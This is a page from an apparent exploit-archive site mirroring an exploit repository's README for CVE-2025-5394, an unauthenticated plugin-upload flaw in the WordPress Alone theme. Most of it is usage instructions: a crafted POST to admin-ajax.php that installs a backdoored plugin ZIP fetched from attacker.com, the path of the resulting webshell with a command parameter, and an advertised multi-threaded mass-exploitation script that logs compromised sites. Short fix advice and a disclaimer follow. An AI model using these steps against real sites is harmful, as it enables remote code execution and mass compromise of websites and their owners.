关联漏洞
标题:
WordPress plugin Alone 安全漏洞
(CVE-2025-5394)
描述:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin Alone 7.8.3及之前版本存在安全漏洞,该漏洞源于函数alone_import_pack_install_plugin缺少能力检查,可能导致任意文件上传。
描述
Alone – Charity Multipurpose Non-profit WordPress Theme <= 7.8.3 - Missing Authorization to Unauthenticated Arbitrary File Upload via Plugin Installation
介绍
# CVE-2025-5394 – WordPress Alone Theme <= 7.8.3 - Unauthenticated Arbitrary File Upload via Plugin Installation
🔥 **Vulnerability Summary**
The WordPress theme **Alone** versions <= 7.8.3 is vulnerable to an **unauthenticated arbitrary file upload** vulnerability. This flaw allows **unauthenticated attackers** to upload and install arbitrary plugin ZIP files from remote URLs via an unprotected AJAX endpoint — resulting in **remote code execution (RCE)** by deploying backdoored plugins.
This vulnerability stems from the `beplus_import_pack_install_plugin` function exposed to the public via `wp_ajax_nopriv_` without any authentication or capability checks. The function installs and activates a plugin from a user-supplied URL.
🔍 **Affected Theme**
- **Theme Name:** Alone – Charity Multipurpose Non-profit WordPress Theme
- **Affected Version:** <= 7.8.3
- **Vulnerability Type:** Unauthenticated Arbitrary File Upload → RCE
- **CVE ID:** CVE-2025-5394
- **CVSS Score:** 9.8 (Critical)
- **Impact:** Full remote code execution (RCE) and full site compromise
🧪 **Exploit Features**
- 🔓 **No authentication required**
- 📦 **Uploads malicious plugin ZIP** directly from remote URL
- 🚀 **Automatically installs and activates** the plugin
- 🐚 **Webshell delivery supported** via embedded PHP in plugin
- ✅ **AJAX endpoint accessible by unauthenticated users:**
`/wp-admin/admin-ajax.php?action=beplus_import_pack_install_plugin`
🧠 **Researcher**
- Credit: [Thai An](https://www.wordfence.com/threat-intel/vulnerabilities/researchers/thai-an-thai-an)
🚀 **Usage**
1. Prepare a malicious plugin ZIP file hosted on a server you control.
- Must contain a valid plugin header (`Plugin Name:`) and PHP backdoor (e.g., `bk.php`)
2. Craft the following POST request:
```http
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: victim.com
Content-Type: application/x-www-form-urlencoded
action=beplus_import_pack_install_plugin&
data[plugin_slug]=hello-dolly&
data[plugin_source]=https://attacker.com/hello-dolly.zip
```
3. If successful, the plugin is installed and activated. Access your shell at:
```
https://victim.com/wp-content/plugins/hello-dolly/bk.php?cmd=id
```
🧰 **Mass Exploitation Script**
This repository includes a mass exploit tool with:
- Multi-threaded processing
- Automatic HTTPS prefixing (if missing)
- Live logging of successful targets to `result.txt`
See [`mass_beplus_exploit.py`](./mass_beplus_exploit.py) for details.
🛠 **Fix Recommendations**
- Theme authors should remove or secure the `wp_ajax_nopriv_beplus_import_pack_install_plugin` hook.
- Implement authentication/capability checks (e.g., `current_user_can('install_plugins')`)
- Validate and restrict plugin sources.
- Use a Web Application Firewall (WAF) to block unauthorized admin-ajax access.
🔒 **Disclaimer:**
This information is provided for educational and authorized security testing purposes only. Unauthorized access or use of computer systems is illegal and unethical.
📚 **Reference:**
- [Wordfence Advisory – CVE-2025-5394](https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/alone/alone-charity-multipurpose-non-profit-wordpress-theme-783-missing-authorization-to-unauthenticated-arbitrary-file-upload-via-plugin-installation)
CVE: CVE-2025-5394
Researcher: [Thai An](https://www.wordfence.com/threat-intel/vulnerabilities/researchers/thai-an-thai-an)
文件快照
[4.0K] /data/pocs/81e7fc5ab68936da8e3cd6cbad24c3837188fcf0
├── [1.7K] mass_beplus_exploit.py
└── [3.4K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。